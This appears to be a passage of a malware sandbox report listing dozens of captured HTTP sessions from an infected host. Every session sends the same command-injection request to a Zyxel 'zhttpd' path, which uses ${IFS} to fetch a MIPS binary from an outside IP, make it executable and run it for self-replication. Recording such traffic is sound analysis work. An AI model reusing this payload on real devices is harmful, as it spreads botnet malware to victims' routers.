                                                Jan 12, 2024 18:16:36.774416924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7901192.168.2.233986899.192.11.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774458885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7902192.168.2.2356724201.49.122.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774503946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7903192.168.2.2338128200.138.82.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774554014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7904192.168.2.235220632.44.47.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774593115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7905192.168.2.2351370207.168.198.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774676085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7906192.168.2.2339068191.138.71.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774709940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7907192.168.2.235007066.115.133.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774749041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7908192.168.2.2356102105.73.188.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774812937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7909192.168.2.2336072109.191.113.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774852991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7910192.168.2.233277050.62.178.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774897099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7911192.168.2.2350956210.50.128.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774955988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7912192.168.2.2351276112.212.223.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.774991035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7913192.168.2.2337192139.171.2.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775027990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7914192.168.2.2353884221.152.66.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775068998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7915192.168.2.2342858126.230.254.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775126934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7916192.168.2.2357072139.78.105.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775154114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7917192.168.2.2355658160.11.128.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775175095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7918192.168.2.235262869.124.128.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775229931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7919192.168.2.2349614217.120.21.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775248051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7920192.168.2.235196299.172.9.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775300026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7921192.168.2.235724651.74.154.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775363922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7922192.168.2.235297650.82.81.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775382996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7923192.168.2.2352292217.31.155.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775427103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7924192.168.2.233862639.38.22.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775460958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7925192.168.2.2341984164.243.225.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775521994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7926192.168.2.235133295.218.110.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775568008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7927192.168.2.2346618194.41.70.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775616884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7928192.168.2.2340328186.184.87.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775670052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7929192.168.2.2348238155.169.239.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775711060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7930192.168.2.235163462.238.117.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775763035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7931192.168.2.2336852223.151.169.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775801897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7932192.168.2.2345016204.105.23.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775834084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7933192.168.2.2348104178.234.116.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775890112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7934192.168.2.234138819.170.230.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775934935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7935192.168.2.2354206183.105.219.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.775970936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7936192.168.2.2340764182.16.81.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776015043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7937192.168.2.2357884134.246.57.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776061058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7938192.168.2.2335694209.62.248.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776112080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7939192.168.2.235342437.225.243.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776154041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7940192.168.2.234491443.195.114.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776221991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7941192.168.2.2358510150.76.66.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776242971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7942192.168.2.233296224.247.199.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776273966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7943192.168.2.2333620194.23.97.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776320934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7944192.168.2.2335124116.71.223.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776405096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7945192.168.2.233607413.111.132.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776412964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7946192.168.2.234585693.129.251.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776451111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7947192.168.2.235968664.38.210.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776487112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7948192.168.2.2333464213.212.47.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776520014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7949192.168.2.234919457.160.29.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776567936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7950192.168.2.234134085.110.51.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776627064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7951192.168.2.2358014179.234.81.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776669025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7952192.168.2.234665874.149.11.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776700020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7953192.168.2.2338030109.49.134.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776766062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7954192.168.2.234249673.112.156.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776840925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7955192.168.2.2356106212.173.95.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776845932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7956192.168.2.235262420.88.51.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776892900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7957192.168.2.2344832184.225.54.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776938915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7958192.168.2.234818032.247.161.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.776968002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7959192.168.2.23350725.18.90.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777075052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7960192.168.2.234195873.53.62.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777076006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7961192.168.2.235995276.84.120.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777107954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7962192.168.2.2346920109.222.146.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777175903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7963192.168.2.2352118104.161.158.82443
                                                TimestampBytes transferredDirectionData
